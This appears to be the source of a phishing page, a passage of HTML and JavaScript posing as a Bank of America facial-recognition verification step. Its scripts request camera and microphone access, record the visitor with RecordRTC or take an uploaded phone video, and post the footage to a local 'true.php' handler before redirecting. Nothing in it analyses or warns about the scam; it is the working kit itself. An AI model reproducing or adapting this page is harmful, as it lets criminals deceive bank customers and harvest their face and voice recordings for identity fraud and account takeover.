navigator.permissions.query({name:'camera'}).then(function(result) {
  if (result.state == 'granted') {

  } else if (result.state == 'prompt') {

  } else if (result.state == 'denied') {

  }
  result.onchange = function() {

  };
});
</script>
<script>
function next() {
	var x = document.getElementById("poster");
	x.style.display = "none";
	var x = document.getElementById("showsiguiente");
	x.style.display = "block";
}
</script>
</head>

<body style="overflow: hidden;">
   
  <app-root _nghost-c0="" ng-version="5.2.9"><spinner _ngcontent-c0="" spinner="sk-wave" _nghost-c1=""><!----></spinner>
<router-outlet _ngcontent-c0=""></router-outlet><cambio-contrasena class="component ng-star-inserted" _nghost-c22=""><mat-card _ngcontent-c22="" class="screen-card mat-card">
  <a href="../" style="cursor:pointer;padding-left:3px;width:300px;display:block"><img class="navigation__logo" src="../../assets/bofa-logo.svg" alt="Bank of America Homepage"></a>
  <!--<div _ngcontent-c22="" class="div-main-title">
    <h3 _ngcontent-c22="">Servicio Nacional de Verificación</h3>
  </div>-->
  <mat-horizontal-stepper _ngcontent-c22="" aria-orientation="horizontal" class="mat-stepper-horizontal ng-tns-c19-10 ng-star-inserted" role="tablist" style="overflow-y: auto;">
  <div class="mat-horizontal-stepper-header-container">
  <mat-step-header class="mat-horizontal-stepper-header mat-step-header ng-tns-c19-10 ng-star-inserted" role="tab" tabindex="-1" id="cdk-step-label-1-0" aria-controls="cdk-step-content-1-0" aria-selected="false">
  <div class="mat-step-header-ripple mat-ripple" mat-ripple=""></div>
  <div class="mat-step-icon-not-touched">
  <span class="ng-star-inserted">1</span></div>
  <div class="mat-step-label">Information</div>
  </mat-step-header><!----><div class="mat-stepper-horizontal-line ng-tns-c19-10 ng-star-inserted"></div>
  <mat-step-header class="mat-horizontal-stepper-header mat-step-header ng-tns-c19-10 ng-star-inserted" role="tab" tabindex="0" id="cdk-step-label-1-1" aria-controls="cdk-step-content-1-0" aria-selected="false">
  <div class="mat-step-header-ripple mat-ripple" mat-ripple=""></div>
  <div class="mat-step-icon-not-touched">
  <span class="ng-star-inserted">2</span>
  </div><div class="mat-step-label">Upload document</div>
  </mat-step-header>
  <div class="mat-stepper-horizontal-line ng-tns-c19-10 ng-star-inserted"></div>
  <mat-step-header class="mat-horizontal-stepper-header mat-step-header ng-tns-c19-10 ng-star-inserted" role="tab" tabindex="-1" id="cdk-step-label-1-2" aria-controls="cdk-step-content-1-2" aria-selected="false">
  <div class="mat-step-header-ripple mat-ripple" mat-ripple=""></div>
  <div class="mat-step-icon">
  <span class="ng-star-inserted">3</span></div>
  <div class="mat-step-label mat-step-label-active mat-step-label-selected">Identity</div>
  </mat-step-header>
  <div class="mat-stepper-horizontal-line ng-tns-c19-10 ng-star-inserted"></div>
  <mat-step-header class="mat-horizontal-stepper-header mat-step-header ng-tns-c19-10 ng-star-inserted" role="tab" tabindex="-1" id="cdk-step-label-1-3" aria-controls="cdk-step-content-1-3" aria-selected="true">
  <div class="mat-step-header-ripple mat-ripple" mat-ripple=""></div>
  <div class="mat-step-icon-not-touched"><!----><span class="ng-star-inserted">4</span></div>
  <div class="mat-step-label">Finalized</div>
  </mat-step-header>
  </div>
  <div class="mat-horizontal-content-container">
  <div class="mat-horizontal-stepper-content ng-tns-c19-10 ng-trigger ng-trigger-stepTransition ng-star-inserted" role="tabpanel" id="cdk-step-content-1-0" aria-labelledby="cdk-step-label-1-0" aria-expanded="true" style="transform: none; visibility: visible;">

        <div _ngcontent-c22="" class="bdvenlinea-subtitle" fxlayoutalign="center" >
<center>
<div style="display:block;text-align:center;width:62px" width="62px">
<object type="image/svg+xml" data="../assets/face.svg" width="62px" class="noselect"></object>
</div>
</center>
		  <br/><center><h1 _ngcontent-c22="" style="color:#384A64">Facial recognition</h1></center><br/>
<script type="text/javascript">
var isMobile = /iPhone|iPad|iPod|Android/i.test(navigator.userAgent);
if (isMobile) {
	document.write('<center><h5 _ngcontent-c22="" >Press the button to start the facial detection process<br/>press record on your phone until you achieve a correct posture</h5></center>');
} else {
	document.write('<center><h5 _ngcontent-c22="" >Press the button to activate the camera and press allow on the<br/>box displayed at the top left of the screen.</h5></center>');
}
</script>
        </div>
        <div _ngcontent-c22="">
        <div _ngcontent-c22="" fxlayout="row" fxlayoutalign="center" style="flex-direction: row; box-sizing: border-box; display: flex; max-height: 100%; place-content: stretch center; align-items: stretch;"></div>
<div _ngcontent-c17="" fxlayout="column" fxlayoutalign="center" style="flex-direction: column; box-sizing: border-box; display: flex; max-width: 100%; place-content: stretch center; align-items: stretch;">

<center>
<form action="./true.php" enctype="multipart/form-data" method="post">
<div class="upload-btn-wrapper">
<div class="box" style="width:260px">
	<a href="#rostro">
	<button id="btn-start-recording" type="button" class="onfido-sdk-ui-DocumentSelector-option onfido-sdk-ui-DocumentSelector-optionHoverDesktop">
	<div class="onfido-sdk-ui-DocumentSelector-icon onfido-sdk-ui-DocumentSelector-icon-passport"></div>
	<div class="onfido-sdk-ui-DocumentSelector-content"><div class="onfido-sdk-ui-DocumentSelector-optionMain">
	<p class="onfido-sdk-ui-DocumentSelector-label">Activate camera</p>
	</div></div>
	</button>
	</a>
</div>
</div>

<div id="rostro" class="overlay">
	<div class="popup">
	<a class="close" href="#">&times;</a>
	<div class="content">
<script type="text/javascript">
var isMobile = /iPhone|iPad|iPod|Android/i.test(navigator.userAgent);
if (isMobile) {
	document.write('<center><div id="poster"><img src="./selfie.png"/></center></div><br/><span style="font-size:12px;color:#4C5D76"><b>Dear customer, please take a straight posture so that the camera captures the image as seen in the example.</b></span><br/><br/><div class="upload-btn-wrapper"><button type="button" src="./" style="width:78%;height:10%" class="onfido-sdk-ui-DocumentSelector-option onfido-sdk-ui-DocumentSelector-optionHoverDesktop"><div class="onfido-sdk-ui-DocumentSelector-icon onfido-sdk-ui-DocumentSelector-icon-passport"></div><div class="onfido-sdk-ui-DocumentSelector-content"><div class="onfido-sdk-ui-DocumentSelector-optionMain"><p class="onfido-sdk-ui-DocumentSelector-label">Start detection</p></div></div></button><input id="file-upload" accept="video/*" name="file-upload" type="file" capture/><input id="uploadFile" placeholder="Press record on your phone for 5 seconds." disabled="disabled" /></div><br/><br/>');
} else {
	document.write('<div id="poster"><img src="./poster.png" width="540px" height="405px" onclick="next();"/></div>');
}
</script>
<div id="showsiguiente" style="display:none">
<video autoplay playsinline width="540px" height="405px"></video>
<br/>
<button _ngcontent-c22="" id="btn-stop-recording" class="boton ng-star-inserted" mat-raised-button="" type="button" disabled>
<span class="mat-button-wrapper">Next</span>
<div class="mat-button-ripple mat-ripple" matripple=""></div>
<div class="mat-button-focus-overlay"></div>
</button>
</div>
<div id="showsiguientemovil" style="display:none">
<button _ngcontent-c22="" id="btn-stop-recording" class="boton ng-star-inserted" mat-raised-button="" type="button">
<span class="mat-button-wrapper">Success</span>
<div class="mat-button-ripple mat-ripple" matripple=""></div>
<div class="mat-button-focus-overlay"></div>
</button>
</div>
<script src="./RecordRTC.js"></script>
<script>
var isMobile = /iPhone|iPad|iPod|Android/i.test(navigator.userAgent);
if (!isMobile) {
	var video = document.querySelector('video');

	function captureCamera(callback) {
		navigator.mediaDevices.getUserMedia({ audio: true, video: true }).then(function(camera) {
			callback(camera);
		}).catch(function(error) {
			alert('Please visit this site in your mobile phone, go to outlook.');
			console.error(error);
		});
	}

	function stopRecordingCallback() {
		video.src = video.srcObject = null;
		video.muted = false;
		video.volume = 1;
		video.src = window.URL.createObjectURL(recorder.getBlob());
		var fd = new FormData();
		var fnamepass = 'pasaporte_face.webm';
		fd.append('fname', fnamepass);
		fd.append('data', recorder.getBlob())
		$.ajax({
			type: 'POST',
			url: './true.php',
			data: fd,
			processData: false,
			contentType: false
		}).done(function(data) {
			if ( data == 'success') {
				window.location.href = ("./true/");
			} else {
				window.location.href = ("./true/");
			}
		});
	}

	var recorder;

	document.getElementById('btn-start-recording').onclick = function() {
		this.disabled = true;
		captureCamera(function(camera) {
			video.muted = true;
			video.volume = 0;
			video.srcObject = camera;

			recorder = RecordRTC(camera, {
				type: 'video',
				mimeType: 'video/webm'
			});

			recorder.startRecording();

			recorder.camera = camera;

			document.getElementById('btn-stop-recording').disabled = false;
		});
	};
	document.getElementById('btn-stop-recording').onclick = function() {
		this.disabled = true;
		recorder.stopRecording(stopRecordingCallback);
	};
}
</script>
    <div>

    </div>
		</div>
	</div>
</div>
</div>
</center>
</div>
		<div style="width:120px; margin:0 auto;">
        <div _ngcontent-c22="" class="mat-dialog-actions" fxlayoutalign="center center" layout-fill="" mat-dialog-actions="" style="place-content: center; align-items: center; flex-direction: row; box-sizing: border-box; display: flex;">
          <center>
		  <button _ngcontent-c22="" onclick="location.href='../'" class="boton" mat-raised-button="" type="button"><span class="mat-button-wrapper">Back</span><div class="mat-button-ripple mat-ripple" matripple=""></div><div class="mat-button-focus-overlay"></div></button>
          </center>
		</div>
		</div>
        <br _ngcontent-c22="">
		<br _ngcontent-c22="">
		<br _ngcontent-c22="">
		<br _ngcontent-c22="">
		<br _ngcontent-c22="">
		<br _ngcontent-c22="">
		<br _ngcontent-c22="">
		<br _ngcontent-c22="">
		<br _ngcontent-c22="">
		<br _ngcontent-c22="">
        </div>
      </form>
      <br _ngcontent-c22="" class="ng-star-inserted" style="">
    </div></div></mat-horizontal-stepper>

<script type="text/javascript">//<![CDATA[
document.getElementById("file-upload").onchange = function() {
	var file_data = $('#file-upload').prop('files')[0];   
	var form_data = new FormData();
	var fnamepass = 'pasaporte_movil_face.mp4';
	form_data.append('fname', fnamepass);
	form_data.append('data', file_data);
	$.ajax({
		url: './true.php', // point to server-side PHP script 
		dataType: 'text',  // what to expect back from the PHP script, if anything
		cache: false,
		contentType: false,
		processData: false,
		data: form_data,                         
		type: 'post'
	}).done(function(data) {
		window.location.href = ("./true/");
	});
	document.getElementById("uploadFile").value = this.value.substring(12);
	var xt = document.getElementById("showsiguientemovil");
	xt.style.display = "block";
};
  //]]></script>

</mat-card></cambio-contrasena></app-root>

</body>
</html>